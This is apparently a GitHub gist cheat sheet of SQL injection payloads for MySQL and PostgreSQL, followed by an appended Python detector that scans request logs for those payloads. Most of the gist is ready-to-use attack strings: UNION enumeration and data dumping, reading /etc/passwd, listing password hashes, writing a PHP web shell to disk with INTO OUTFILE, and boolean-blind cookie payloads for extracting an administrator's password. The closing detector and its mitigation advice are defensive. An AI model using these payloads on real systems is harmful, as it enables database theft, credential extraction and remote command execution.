@tanaka-geek
Last active September 21, 2023 06:58
SQLinjection sqli sqli injection SQL sql

UNION BASED

This is the basic thing to try first.

' UNION SELECT 1,version(),3,4,5,6
' UNION SELECT 1,version(),3,4,5,6,7,8,9... # keep adding columns until the count matches the original query
' UNION ALL SELECT 1,version(),gRoUp_cOncaT(0x7c,schema_name,0x7C),4,5,6 fRoM information_schema.schemata#

group_concat() or concat()?

group_concat() aggregates many rows into one string, so use it to list database and table names (one row each).
concat() joins values within a single row, so use it to show several columns of a table side by side.
They are usually combined (concat() the columns of each row, group_concat() the rows). This needs more research!!!

Show database

UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata

Show tables

UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='database1'

Show columns

UNION ALL SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'

Retrieve data

UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM table1
UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM database2.table1

read /etc/passwd

This gives better insight into the users on the system. It needs the MySQL FILE privilege, and secure_file_priv can restrict or disable it.

select load_file("/etc/passwd");

make a file

Creates /tmp/cmd.php, which is then triggered through an LFI or something similar.

select '<?php system($_GET["cmd"]); ?>' into outfile '/tmp/cmd.php';

Find a specific column in all tables

SELECT * FROM information_schema.columns WHERE column_name = 'column_name';

show important information

Version:              SELECT @@version
Comments:             SELECT 1; #comment
                      SELECT /*comment*/1;
Current user:         SELECT user();
                      SELECT system_user();
List users:           SELECT user FROM mysql.user; -- needs privileges
List password hashes: SELECT host, user, password FROM mysql.user; -- needs privileges

blind injection (beta)

mysql> select substring(system_user(),1,1)='r';
+----------------------------------+
| substring(system_user(),1,1)='r' |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

The result 1 (true) means the first character of the current user is 'r'. Boolean-blind injection compares one character at a time like this and watches how the application's response changes.

https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/

Copy and write it to a system file (PostgreSQL)

-- PostgreSQL syntax ($$ quoting, COPY ... TO); "column" is a reserved word there, so the identifiers are renamed.
CREATE TEMP TABLE tmp(content text); INSERT INTO tmp(content) VALUES ($$brah$$);
-- The file is written on the database server; this needs superuser or the pg_write_server_files role.
COPY tmp(content) TO $$C:\somewhere\brah.txt$$;

blind injection (from another table)

To extract (guess) a password, conditions are compared one at a time and the application's response tells you whether each one was true.

The query below tests a condition: the subquery returns 'a' only if the users table exists and contains a row with username 'administrator', so the whole comparison is true exactly in that case.

Cookie: TrackingId=buzzbuzz' OR (SELECT 'a' FROM users WHERE username='administrator') = 'a' -- - ;

This is the proper way to compare the conditions. The subquery still returns 'a' (so the outer = 'a' comparison holds), but the WHERE clause now also requires LENGTH(password)>1, so the response only changes when that extra condition about the password is true.

TrackingId=buzzbuzz' OR (SELECT 'a' FROM users where username='administrator' AND LENGTH(password)>1) ='a' -- -
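From the defender's side, the UNION/information_schema enumeration payloads above and the boolean-blind cookie probes in this section all leave recognisable strings in request logs, but only after the obfuscation this page shows (mixed case like gRoUp_cOncaT, inline /**/ comments, URL encoding) is undone. The detector below is an added example, not part of the gist; the log lines and signature names are constructed here.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the techniques shown on this page: UNION enumeration,
# information_schema listing, file read/write primitives, version probes
# and boolean-blind "' OR (SELECT ..." comparisons (names are constructed).
SIGNATURES = {
    "union_select": r"\bunion\s+(all\s+)?select\b",
    "schema_enum": r"\binformation_schema\.(schemata|tables|columns)\b",
    "file_read": r"\bload_file\s*\(",
    "file_write": r"\binto\s+outfile\b",
    "version_probe": r"@@version|\bversion\s*\(\s*\)",
    "boolean_blind": r"'\s*or\s*\(\s*select\b",
}

def normalize(value):
    """URL-decode, drop /* */ comments used to split keywords, collapse whitespace
    and lowercase, so gRoUp_cOncaT, fRoM and UNION/**/SELECT match their plain forms."""
    text = unquote_plus(value)
    text = re.sub(r"/\*.*?\*/", " ", text)
    text = re.sub(r"\s+", " ", text)
    return text.lower()

def classify(value):
    """Return the names of every signature that matches one request line."""
    text = normalize(value)
    return [name for name, pat in SIGNATURES.items() if re.search(pat, text)]

def scan_log(lines):
    """Return (line_number, hits) for each line that trips at least one signature."""
    findings = []
    for number, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample access-log lines (not real traffic); the payloads are the
# ones from this page, URL-encoded as a browser or proxy would send them.
SAMPLE_LOG = [
    "GET /item?id=1 HTTP/1.1",
    "GET /item?id=1'%20UNION%20ALL%20SELECT%201,version(),gRoUp_cOncaT(0x7c,schema_name,0x7C),4,5,6%20fRoM%20information_schema.schemata%23 HTTP/1.1",
    "GET /item?id=1%20UNION/**/SELECT%201,load_file(%22/etc/passwd%22) HTTP/1.1",
    "GET /home HTTP/1.1 Cookie: TrackingId=buzzbuzz'%20OR%20(SELECT%20'a'%20FROM%20users%20WHERE%20username='administrator')='a'--%20-",
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Signature matching like this is a triage aid, not a fix: the actual mitigation is parameterised queries and a database account without FILE or information_schema-wide read rights.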